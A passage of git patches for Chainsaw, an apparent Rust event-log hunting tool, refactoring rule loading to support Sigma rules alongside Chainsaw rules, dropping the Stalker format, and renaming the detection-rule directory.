uuid::Uuid; use crate::file::Kind as FileKind; use crate::hunt::{Detections, Hunt, Kind}; -use crate::rule::{ - chainsaw::{Level, Rule as Chainsaw, Status}, - Kind as RuleKind, -}; +use crate::rule::{Kind as RuleKind, Level, Rule, Status}; use crate::write::WRITER; #[cfg(not(windows))] @@ -106,13 +103,13 @@ pub struct Grouping<'a> { pub struct Hit<'a> { hunt: &'a Hunt, - rule: &'a Chainsaw, + rule: &'a Rule, } pub fn print_detections( detections: &[Detections], hunts: &[Hunt], - rules: &HashMap>, + rules: &BTreeMap, column_width: u32, full: bool, local: bool, @@ -160,7 +157,6 @@ pub fn print_detections( // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); - let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Unpack detections let mut groups: HashMap<&String, Vec> = HashMap::new(); @@ -173,7 +169,7 @@ pub fn print_detections( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -239,7 +235,7 @@ pub fn print_detections( }; let mut rows = vec![]; - let mut seen: HashMap> = HashMap::new(); + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); @@ -319,18 +315,30 @@ pub fn print_detections( cell!("status").style_spec("c"), ])); for rule in &rules { - table.add_row(Row::new(vec![ - cell!(split_tag(&rule.name)), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); + match rule { + Rule::Chainsaw(c) => { + table.add_row(Row::new(vec![ + cell!(split_tag(&c.name)), + cell!(c.authors.join("\n")), + cell!(c.level), + cell!(c.status), + ])); + } + Rule::Sigma(s) => { + table.add_row(Row::new(vec![ + cell!(split_tag(&s.name)), + cell!(s.authors.join("\n")), + cell!(s.level), + cell!(s.status), + ])); + } + } } cells.push(cell!(table)); } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name))) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name()))) .collect::>() .join("\n"))); } @@ -348,7 +356,7 @@ pub fn print_detections( pub fn print_csv( detections: &[Detections], hunts: &[Hunt], - rules: &HashMap>, + rules: &BTreeMap, local: bool, timezone: Option, ) -> crate::Result<()> { @@ -382,7 +390,6 @@ pub fn print_csv( // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); - let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Unpack detections let mut groups: HashMap<&String, Vec> = HashMap::new(); @@ -395,7 +402,7 @@ pub fn print_csv( (*hits).push(Hit { hunt, rule }); } for ((group, timestamp), mut hits) in hits { - hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + hits.sort_by(|x, y| x.rule.name().cmp(&y.rule.name())); let groups = groups.entry(group).or_insert(vec![]); (*groups).push(Grouping { kind: &detection.kind, @@ -459,7 +466,7 @@ pub fn print_csv( }; let mut rows = vec![]; - let mut seen: HashMap> = HashMap::new(); + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); @@ -527,7 +534,7 @@ pub fn print_csv( cells.push( rules .iter() - .map(|rule| rule.name.to_string()) + .map(|rule| rule.name().to_string()) .collect::>() .join(";"), ); @@ -550,28 +557,25 @@ pub struct Detection<'a> { pub authors: &'a Vec, pub level: &'a Level, - pub source: &'a RuleKind, + pub source: RuleKind, pub status: &'a Status, } pub fn print_json( detections: &[Detections], - rules: &HashMap>, + hunts: &[Hunt], + rules: &BTreeMap, local: bool, timezone: Option, ) -> crate::Result<()> { - let mut rs: HashMap<_, _> = HashMap::new(); - for (kind, rules) in rules { - for (id, rule) in rules { - rs.insert(id, (kind, rule)); - } - } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let mut detections = detections .iter() .flat_map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { - let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); + let hunt = hunts.get(&hit.hunt).expect("could not get rule!"); + let rule = rules.get(&hit.rule).expect("could not get rule!"); let localised = if let Some(timezone) = timezone { timezone .from_local_datetime(&hit.timestamp) @@ -586,16 +590,28 @@ pub fn print_json( } else { DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() }; - detections.push(Detection { - authors: &rule.authors, - group: &rule.group, - kind: &d.kind, - level: &rule.level, - name: &rule.name, - source: kind, - status: &rule.status, - timestamp: localised, - }) + match rule { + Rule::Chainsaw(c) => detections.push(Detection { + authors: &c.authors, + group: &hunt.group, + kind: &d.kind, + level: &c.level, + name: &c.name, + source: RuleKind::Chainsaw, + status: &c.status, + timestamp: localised, + }), + Rule::Sigma(s) => detections.push(Detection { + authors: &s.authors, + group: &hunt.group, + kind: &d.kind, + level: &s.level, + name: &s.name, + source: RuleKind::Sigma, + status: &s.status, + timestamp: localised, + }), + } } detections }) diff --git a/src/hunt.rs b/src/hunt.rs index eb3ab59a..35ffbe12 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -1,4 +1,4 @@ -use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, BTreeMap, HashMap, HashSet}; use std::fs; use std::hash::{Hash, Hasher}; use std::io::Read; @@ -18,8 +18,8 @@ use uuid::Uuid; use crate::file::{Document as File, Kind as FileKind, Reader}; use crate::rule::{ - chainsaw::{Aggregate, Container, Field, Filter, Format, Rule as Chainsaw}, - Kind as RuleKind, Rule, + chainsaw::{Container, Field, Format}, + Aggregate, Filter, Kind as RuleKind, Rule, }; #[derive(Clone, Deserialize)] @@ -89,33 +89,34 @@ impl HunterBuilder { let mut hunts = vec![]; let rules = match self.rules { Some(mut rules) => { - rules.sort_by(|x, y| x.chainsaw.name.cmp(&y.chainsaw.name)); - let mut map = HashMap::new(); + rules.sort_by(|x, y| x.name().cmp(&y.name())); + let mut map = BTreeMap::new(); for rule in rules { let uuid = Uuid::new_v4(); - let rules = map.entry(rule.kind.clone()).or_insert(vec![]); - if rule.kind == RuleKind::Chainsaw { - let mapper = Mapper::from(rule.chainsaw.fields.clone()); - hunts.push(Hunt { - id: uuid, - - group: rule.chainsaw.group.clone(), - kind: HuntKind::Rule { - aggregate: rule.chainsaw.aggregate.clone(), - filter: rule.chainsaw.filter.clone(), - }, - timestamp: rule.chainsaw.timestamp.clone(), - - file: rule.chainsaw.kind.clone(), - mapper, - rule: rule.kind, - }); + match &rule { + Rule::Chainsaw(rule) => { + let mapper = Mapper::from(rule.fields.clone()); + hunts.push(Hunt { + id: uuid, + + group: rule.group.clone(), + kind: HuntKind::Rule { + aggregate: rule.aggregate.clone(), + filter: rule.filter.clone(), + }, + timestamp: rule.timestamp.clone(), + + file: rule.kind.clone(), + mapper, + }); + } + _ => {} } - (*rules).push((uuid, rule.chainsaw)); + map.insert(uuid, rule); } map } - None => HashMap::new(), + None => BTreeMap::new(), }; if let Some(mut mappings) = self.mappings { mappings.sort(); @@ -130,6 +131,9 @@ impl HunterBuilder { Ok(a) => a, Err(e) => anyhow::bail!("Provided mapping file is invalid - {}", e), }; + if let RuleKind::Chainsaw = mapping.rules { + anyhow::bail!("Chainsaw rules do not support mappings"); + } mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); for group in mapping.groups { let mapper = Mapper::from(group.fields); @@ -140,12 +144,12 @@ impl HunterBuilder { kind: HuntKind::Group { exclusions: mapping.exclusions.clone(), filter: group.filter, + kind: mapping.rules.clone(), }, timestamp: group.timestamp, file: mapping.kind.clone(), mapper, - rule: mapping.rules.clone(), }); } } @@ -215,6 +219,7 @@ pub enum HuntKind { Group { exclusions: HashSet, filter: Expression, + kind: RuleKind, }, Rule { aggregate: Option, @@ -342,7 +347,6 @@ pub struct Hunt { pub timestamp: String, pub file: FileKind, - pub rule: RuleKind, } impl Hunt { @@ -356,7 +360,7 @@ impl Hunt { pub struct HunterInner { hunts: Vec, - rules: HashMap>, + rules: BTreeMap, load_unknown: bool, local: bool, @@ -444,53 +448,50 @@ impl Hunter { } match &hunt.kind { - HuntKind::Group { exclusions, filter } => { - if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(filter, &mapped) { - for (rid, rule) in rules { - if exclusions.contains(&rule.name) { - continue; - } - let hit = match &rule.filter { - Filter::Detection(detection) => { - tau_engine::solve(detection, &mapped) - } - Filter::Expression(expression) => { - tau_engine::core::solve(expression, &mapped) - } - }; - if hit { - if let Some(aggregate) = &rule.aggregate { - files - .insert(document_id, (document.clone(), timestamp)); - let mut hasher = DefaultHasher::new(); - let mut skip = false; - for field in &aggregate.fields { - if let Some(value) = - mapped.find(field).and_then(|s| s.to_string()) - { - value.hash(&mut hasher); - } else { - skip = true; - break; - } - } - if skip { - continue; + HuntKind::Group { + exclusions, + filter, + kind, + } => { + if tau_engine::core::solve(filter, &mapped) { + for (rid, rule) in &self.inner.rules { + if !rule.is_kind(kind) { + continue; + } + if exclusions.contains(rule.name()) { + continue; + } + let hit = rule.solve(&mapped); + if hit { + if let Some(aggregate) = &rule.aggregate() { + files.insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; } - let id = hasher.finish(); - let aggregates = aggregates - .entry((hunt.id, *rid)) - .or_insert((aggregate, HashMap::new())); - let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id); - } else { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); } + if skip { + continue; + } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + .or_insert((aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); } } } @@ -603,7 +604,7 @@ impl Hunter { &self.inner.hunts } - pub fn rules(&self) -> &HashMap> { + pub fn rules(&self) -> &BTreeMap { &self.inner.rules } diff --git a/src/lib.rs b/src/lib.rs index 1aef655d..d69a30d3 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -6,8 +6,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; pub use rule::{ - chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind, Level as RuleLevel, - Status as RuleStatus, + lint, load, sigma, Filter, Kind as RuleKind, Level as RuleLevel, Status as RuleStatus, }; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index 84e0decd..d24b230f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -13,8 +13,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, RuleLevel, - RuleStatus, Searcher, Writer, + cli, get_files, lint as lint_rule, load as load_rule, set_writer, Filter, Format, Hunter, + RuleKind, RuleLevel, RuleStatus, Searcher, Writer, }; #[derive(StructOpt)] @@ -86,6 +86,9 @@ enum Command { /// Supress informational output. #[structopt(short = "q")] quiet: bool, + /// Sigma rules to hunt with. + #[structopt(short = "s", long = "sigma", number_of_values = 1, requires("mapping"))] + sigma: Option>, /// Continue to hunt when an error is encountered. #[structopt(long = "skip-errors")] skip_errors: bool, @@ -242,6 +245,7 @@ fn run() -> Result<()> { metadata, output, quiet, + sigma, skip_errors, status, timezone, @@ -255,6 +259,7 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; + let sigma = sigma.unwrap_or_default(); cs_eprintln!( "[+] Loading event logs from: {}", @@ -292,20 +297,29 @@ fn run() -> Result<()> { let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file, &mapping.is_some(), &kinds, &levels, &statuses) { - Ok(mut r) => { + match load_rule(RuleKind::Chainsaw, &file, &kinds, &levels, &statuses) { + Ok(r) => { if !r.is_empty() { count += 1; - rs.append(&mut r) + rs.extend(r) } } - Err(e) => { - // Hacky way of exposing rule types from load_rule function - if e.to_string() == "sigma-no-mapping" { - return Err(anyhow::anyhow!( - "No mapping file specified for provided Sigma rules, specify one with the '-m' flag", - )); + Err(_) => { + failed += 1; + } + } + } + } + for path in &sigma { + for file in get_files(path, &None, skip_errors)? { + match load_rule(RuleKind::Sigma, &file, &kinds, &levels, &statuses) { + Ok(r) => { + if !r.is_empty() { + count += 1; + rs.extend(r) } + } + Err(_) => { failed += 1; } } @@ -370,7 +384,7 @@ fn run() -> Result<()> { if csv { cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { - cli::print_json(&detections, hunter.rules(), local, timezone)?; + cli::print_json(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 7d52f70f..d1e93137 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -2,26 +2,15 @@ use std::fmt; use std::fs::File; use std::io::Read; use std::path::Path; -use std::str::FromStr; use serde::{ de::{self, MapAccess, Visitor}, - Deserialize, Serialize, -}; -use tau_engine::core::{ - optimiser, - parser::{Expression, Pattern}, - Detection, + Deserialize, }; +use tau_engine::core::optimiser; use crate::file::Kind; - -#[derive(Clone, Debug, Deserialize)] -pub struct Aggregate { - #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] - pub count: Pattern, - pub fields: Vec, -} +use crate::rule::{Aggregate, Filter, Level, Status}; #[derive(Clone, Debug, Deserialize)] pub struct Container { @@ -120,87 +109,12 @@ impl<'de> Deserialize<'de> for Field { } } -#[derive(Clone, Debug, Deserialize)] -#[serde(untagged)] -pub enum Filter { - Detection(Detection), - #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] - Expression(Expression), -} - #[derive(Clone, Debug, Deserialize)] #[serde(rename_all = "snake_case")] pub enum Format { Json, } -#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] -#[serde(rename_all = "snake_case")] -pub enum Level { - Critical, - High, - Medium, - Low, - Info, -} - -impl fmt::Display for Level { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - match self { - Self::Critical => write!(f, "critical"), - Self::High => write!(f, "high"), - Self::Medium => write!(f, "medium"), - Self::Low => write!(f, "low"), - Self::Info => write!(f, "info"), - } - } -} - -impl FromStr for Level { - type Err = anyhow::Error; - - fn from_str(s: &str) -> Result { - let v = match s { - "critical" => Self::Critical, - "high" => Self::High, - "medium" => Self::Medium, - "low" => Self::Low, - "info" => Self::Info, - _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), - }; - Ok(v) - } -} - -#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] -#[serde(rename_all = "snake_case")] -pub enum Status { - Stable, - Experimental, -} - -impl fmt::Display for Status { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - match self { - Self::Stable => write!(f, "stable"), - Self::Experimental => write!(f, "experimental"), - } - } -} - -impl FromStr for Status { - type Err = anyhow::Error; - - fn from_str(s: &str) -> Result { - let v = match s { - "stable" => Self::Stable, - "experimental" => Self::Experimental, - _ => anyhow::bail!("unknown status, must be: stable or experimental"), - }; - Ok(v) - } -} - #[derive(Clone, Debug, Deserialize)] pub struct Rule { #[serde(alias = "title")] diff --git a/src/rule/mod.rs b/src/rule/mod.rs index e7d44ba5..4f972978 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -4,23 +4,100 @@ use std::path::Path; use std::str::FromStr; use serde::{Deserialize, Serialize}; +use tau_engine::{ + core::{ + optimiser, + parser::{Expression, Pattern}, + Detection, + }, + Document, +}; -use crate::file::Kind as FileKind; - -pub use self::chainsaw::{Filter, Level, Rule as Chainsaw, Status}; +pub use self::chainsaw::Rule as Chainsaw; pub use self::sigma::Rule as Sigma; -pub use self::stalker::Rule as Stalker; pub mod chainsaw; pub mod sigma; -pub mod stalker; + +#[derive(Clone, Debug)] +pub enum Rule { + Chainsaw(Chainsaw), + Sigma(Sigma), +} + +impl Rule { + #[inline] + pub fn aggregate(&self) -> &Option { + match self { + Self::Chainsaw(c) => &c.aggregate, + Self::Sigma(s) => &s.aggregate, + } + } + + #[inline] + pub fn is_kind(&self, kind: &Kind) -> bool { + match self { + Self::Chainsaw(_) => kind == &Kind::Chainsaw, + Self::Sigma(_) => kind == &Kind::Sigma, + } + } + + #[inline] + pub fn level(&self) -> &Level { + match self { + Self::Chainsaw(c) => &c.level, + Self::Sigma(s) => &s.level, + } + } + + #[inline] + pub fn name(&self) -> &String { + match self { + Self::Chainsaw(c) => &c.name, + Self::Sigma(s) => &s.name, + } + } + + #[inline] + pub fn solve(&self, document: &dyn Document) -> bool { + match self { + Self::Chainsaw(c) => match &c.filter { + Filter::Detection(detection) => tau_engine::solve(detection, document), + Filter::Expression(expression) => tau_engine::core::solve(expression, document), + }, + Self::Sigma(s) => tau_engine::solve(&s.tau.detection, document), + } + } + + #[inline] + pub fn status(&self) -> &Status { + match self { + Self::Chainsaw(c) => &c.status, + Self::Sigma(s) => &s.status, + } + } +} + +#[derive(Clone, Debug, Deserialize)] +pub struct Aggregate { + #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] + pub count: Pattern, + pub fields: Vec, +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(untagged)] +pub enum Filter { + Detection(Detection), + #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] + Expression(Expression), +} #[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Kind { Chainsaw, Sigma, - Stalker, } impl Default for Kind { @@ -34,7 +111,6 @@ impl fmt::Display for Kind { match self { Self::Chainsaw => write!(f, "chainsaw"), Self::Sigma => write!(f, "sigma"), - Self::Stalker => write!(f, "stalker"), } } } @@ -46,22 +122,81 @@ impl FromStr for Kind { let v = match s { "chainsaw" => Self::Chainsaw, "sigma" => Self::Sigma, - "stalker" => Self::Stalker, - _ => anyhow::bail!("unknown kind, must be: chainsaw, sigma or stalker"), + _ => anyhow::bail!("unknown kind, must be: chainsaw, or sigma"), + }; + Ok(v) + } +} + +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Level { + Critical, + High, + Medium, + Low, + Info, +} + +impl fmt::Display for Level { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Critical => write!(f, "critical"), + Self::High => write!(f, "high"), + Self::Medium => write!(f, "medium"), + Self::Low => write!(f, "low"), + Self::Info => write!(f, "info"), + } + } +} + +impl FromStr for Level { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "critical" => Self::Critical, + "high" => Self::High, + "medium" => Self::Medium, + "low" => Self::Low, + "info" => Self::Info, + _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), }; Ok(v) } } -#[derive(Debug)] -pub struct Rule { - pub chainsaw: Chainsaw, - pub kind: Kind, +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Status { + Stable, + Experimental, +} + +impl fmt::Display for Status { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Stable => write!(f, "stable"), + Self::Experimental => write!(f, "experimental"), + } + } } -pub fn load_rule( +impl FromStr for Status { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "stable" => Self::Stable, + "experimental" => Self::Experimental, + _ => anyhow::bail!("unknown status, must be: stable or experimental"), + }; + Ok(v) + } +} +pub fn load( + kind: Kind, path: &Path, - mapping: &bool, kinds: &Option>, levels: &Option>, statuses: &Option>, @@ -71,139 +206,64 @@ pub fn load_rule( anyhow::bail!("rule must have a yaml file extension"); } } - - // This is a bit crude but we try all formats then report the errors... - let mut rules = if let Ok(rule) = chainsaw::load(path) { - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Chainsaw) { - return Ok(vec![]); - } - } - vec![Rule { - chainsaw: rule, - kind: Kind::Chainsaw, - }] - } else if let Ok(rules) = sigma::load(path) { - if !mapping { - // Hacky way of exposing rule types from load_rule function - anyhow::bail!("sigma-no-mapping"); - } - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Sigma) { - return Ok(vec![]); + let mut rules = match kind { + Kind::Chainsaw => { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Chainsaw) { + return Ok(vec![]); + } } + let rule = chainsaw::load(path)?; + vec![Rule::Chainsaw(rule)] } - let sigma = match rules - .into_iter() - .map(|y| serde_yaml::from_value::(y)) - .collect::, _>>() - { - Ok(rules) => rules, - Err(_) => { - anyhow::bail!("failed to load rule, run the linter for more information"); - } - }; - sigma - .into_iter() - .map(|rule: Sigma| Rule { - chainsaw: Chainsaw { - name: rule.name, - group: "".to_owned(), - description: rule.description, - authors: rule.authors, - // NOTE: A fake value as this is not used for non chainsaw rules - kind: FileKind::Evtx, - level: rule - .level - .map(|l| match l.as_str() { - "critical" => chainsaw::Level::Critical, - "high" => chainsaw::Level::High, - "medium" => chainsaw::Level::Medium, - "low" => chainsaw::Level::Low, - _ => chainsaw::Level::Info, - }) - .unwrap_or_else(|| chainsaw::Level::Info), - status: rule - .status - .map(|s| match s.as_str() { - "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Experimental, - }) - .unwrap_or_else(|| chainsaw::Status::Experimental), - timestamp: "".to_owned(), - - fields: vec![], - - filter: chainsaw::Filter::Detection( - rule.tau.optimise(Default::default()).detection, - ), - - aggregate: rule.aggregate.map(|a| chainsaw::Aggregate { - count: a.count, - fields: a.fields, - }), - }, - kind: Kind::Sigma, - }) - .collect() - } else if let Ok(rule) = stalker::load(path) { - if let Some(kinds) = kinds.as_ref() { - if !kinds.contains(&Kind::Stalker) { - return Ok(vec![]); + Kind::Sigma => { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Sigma) { + return Ok(vec![]); + } } + let sigma = match sigma::load(path)? + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>() + { + Ok(rules) => rules, + Err(_) => { + anyhow::bail!("failed to load rule, run the linter for more information"); + } + }; + sigma + .into_iter() + .map(|mut s| { + s.tau.detection.expression = optimiser::coalesce( + s.tau.detection.expression, + &s.tau.detection.identifiers, + ); + s.tau.detection.identifiers.clear(); + s.tau.detection.expression = optimiser::shake(s.tau.detection.expression); + s.tau.detection.expression = optimiser::rewrite(s.tau.detection.expression); + s.tau.detection.expression = optimiser::matrix(s.tau.detection.expression); + Rule::Sigma(s) + }) + .collect() } - vec![Rule { - chainsaw: Chainsaw { - name: rule.tag, - group: "".to_owned(), - description: rule.description, - authors: rule.authors, - // NOTE: A fake value as this is not used for non chainsaw rules - kind: FileKind::Evtx, - level: match rule.level.as_str() { - "critical" => chainsaw::Level::Critical, - "high" => chainsaw::Level::High, - "medium" => chainsaw::Level::Medium, - "low" => chainsaw::Level::Low, - _ => chainsaw::Level::Info, - }, - status: match rule.status.as_str() { - "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Experimental, - }, - timestamp: "".to_owned(), - - fields: vec![], - - filter: chainsaw::Filter::Detection( - rule.tau.optimise(Default::default()).detection, - ), - - aggregate: None, - }, - kind: Kind::Stalker, - }] - } else { - anyhow::bail!("failed to load rule, run the linter for more information"); }; - if let Some(levels) = levels.as_ref() { rules = rules .into_iter() - .filter(|r| levels.contains(&r.chainsaw.level)) + .filter(|r| levels.contains(&r.level())) .collect(); } if let Some(statuses) = statuses.as_ref() { rules = rules .into_iter() - .filter(|r| statuses.contains(&r.chainsaw.status)) + .filter(|r| statuses.contains(&r.status())) .collect(); } - Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { +pub fn lint(kind: &Kind, path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -237,14 +297,6 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { } } }, - Kind::Stalker => match stalker::load(path) { - Ok(rule) => { - vec![Filter::Detection(rule.tau.detection)] - } - Err(e) => { - anyhow::bail!("{}", e); - } - }, }; Ok(detections) } diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 891a7e7d..052a39fb 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -9,6 +9,8 @@ use serde::{Deserialize, Serialize}; use serde_yaml::{Mapping, Sequence, Value as Yaml}; use tau_engine::Rule as Tau; +use super::{Level, Status}; + #[derive(Clone, Debug, Deserialize)] #[serde(rename_all = "lowercase")] pub struct Rule { @@ -18,12 +20,12 @@ pub struct Rule { pub tau: Tau, #[serde(default)] - pub aggregate: Option, + pub aggregate: Option, pub authors: Vec, pub description: String, - pub level: Option, - pub status: Option, + pub level: Level, + pub status: Status, } #[derive(Clone, Debug, Deserialize, Serialize)] @@ -71,9 +73,13 @@ impl Sigma { tau.insert("title".into(), header.title.into()); tau.insert("description".into(), header.description.into()); if let Some(status) = header.status { + let status = match status.as_str() { + "stable" => status.to_owned(), + _ => "experimental".to_owned(), + }; tau.insert("status".into(), status.into()); } else { - tau.insert("status".into(), "testing".into()); + tau.insert("status".into(), "experimental".into()); } if let Some(references) = header.references { tau.insert("references".into(), references.into()); @@ -676,8 +682,14 @@ pub fn load(rule: &Path) -> Result> { }?; let tau = detections_to_tau(detection)?; let mut rule = base.clone(); - if let Some(level) = main.level.as_ref() { - rule.insert("level".into(), level.clone().into()); + if let Some(level) = &main.level { + let level = match level.as_str() { + "critical" | "high" | "medium" | "low" => level.to_owned(), + _ => "info".to_owned(), + }; + rule.insert("level".into(), level.into()); + } else { + rule.insert("level".into(), "info".into()); } for (k, v) in tau { rule.insert(k, v); diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs deleted file mode 100644 index 729d0fee..00000000 --- a/src/rule/stalker.rs +++ /dev/null @@ -1,25 +0,0 @@ -use std::fs::File; -use std::io::Read; -use std::path::Path; - -use serde::Deserialize; -use tau_engine::Rule as Tau; - -#[derive(Clone, Debug, Deserialize)] -pub struct Rule { - pub tag: String, - pub tau: Tau, - pub description: String, - pub level: String, - pub status: String, - pub authors: Vec, -} - -pub fn load(rule: &Path) -> crate::Result { - let mut file = File::open(rule)?; - let mut contents = String::new(); - file.read_to_string(&mut contents)?; - - let rule: Rule = serde_yaml::from_str(&contents)?; - Ok(rule) -} From fa3bf2c51a5e4ef2664227ac25f9bfa16f0be692 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 14:36:03 +0100 Subject: [PATCH 47/77] refactor: move chainsaw_rules back to rules --- {chainsaw_rules => rules}/account_tampering/new_user_created.yml | 0 .../account_tampering/user_added_to_global_group.yml | 0 .../account_tampering/user_added_to_local_group.yml | 0 .../account_tampering/user_added_to_universal_group.yml | 0 {chainsaw_rules => rules}/antivirus/f-secure.yml | 0 {chainsaw_rules => rules}/antivirus/kaspersky.yml | 0 {chainsaw_rules => rules}/antivirus/sophos.yml | 0 {chainsaw_rules => rules}/antivirus/windows_defender.yml | 0 {chainsaw_rules => rules}/lateral_movement/batch_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/interactive_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/network_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/rdp_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/service_logon.yml | 0 {chainsaw_rules => rules}/lateral_movement/unlock_logon.yml | 0 .../log_tampering/security_audit_log_was_cleared.yml | 0 .../log_tampering/system_log_was_cleared.yml | 0 {chainsaw_rules => rules}/login_attacks/account_brute_force.yml | 0 {chainsaw_rules => rules}/service_tampering/event_log.yml | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename {chainsaw_rules => rules}/account_tampering/new_user_created.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_global_group.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_local_group.yml (100%) rename {chainsaw_rules => rules}/account_tampering/user_added_to_universal_group.yml (100%) rename {chainsaw_rules => rules}/antivirus/f-secure.yml (100%) rename {chainsaw_rules => rules}/antivirus/kaspersky.yml (100%) rename {chainsaw_rules => rules}/antivirus/sophos.yml (100%) rename {chainsaw_rules => rules}/antivirus/windows_defender.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/batch_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/interactive_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/network_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/rdp_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/service_logon.yml (100%) rename {chainsaw_rules => rules}/lateral_movement/unlock_logon.yml (100%) rename {chainsaw_rules => rules}/log_tampering/security_audit_log_was_cleared.yml (100%) rename {chainsaw_rules => rules}/log_tampering/system_log_was_cleared.yml (100%) rename {chainsaw_rules => rules}/login_attacks/account_brute_force.yml (100%) rename {chainsaw_rules => rules}/service_tampering/event_log.yml (100%) diff --git a/chainsaw_rules/account_tampering/new_user_created.yml 